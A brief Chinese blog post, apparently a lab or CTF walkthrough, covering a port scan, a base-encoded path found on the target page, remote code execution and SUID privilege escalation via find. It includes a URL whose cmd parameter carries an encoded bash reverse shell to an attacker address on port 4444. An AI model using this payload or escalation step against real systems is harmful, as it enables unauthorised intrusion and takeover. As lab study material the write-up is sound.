李乐意的博客

tags:
@ 01/01/0001

端口扫描

22和80。

页面检查中包含base编码路径。

远程代码执行

http://192.168.30.151/workinginprogress.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.30.131%2F4444%200%3E%261%27

SUID

grep和find。

https://gtfobins.github.io/gtfobins/find/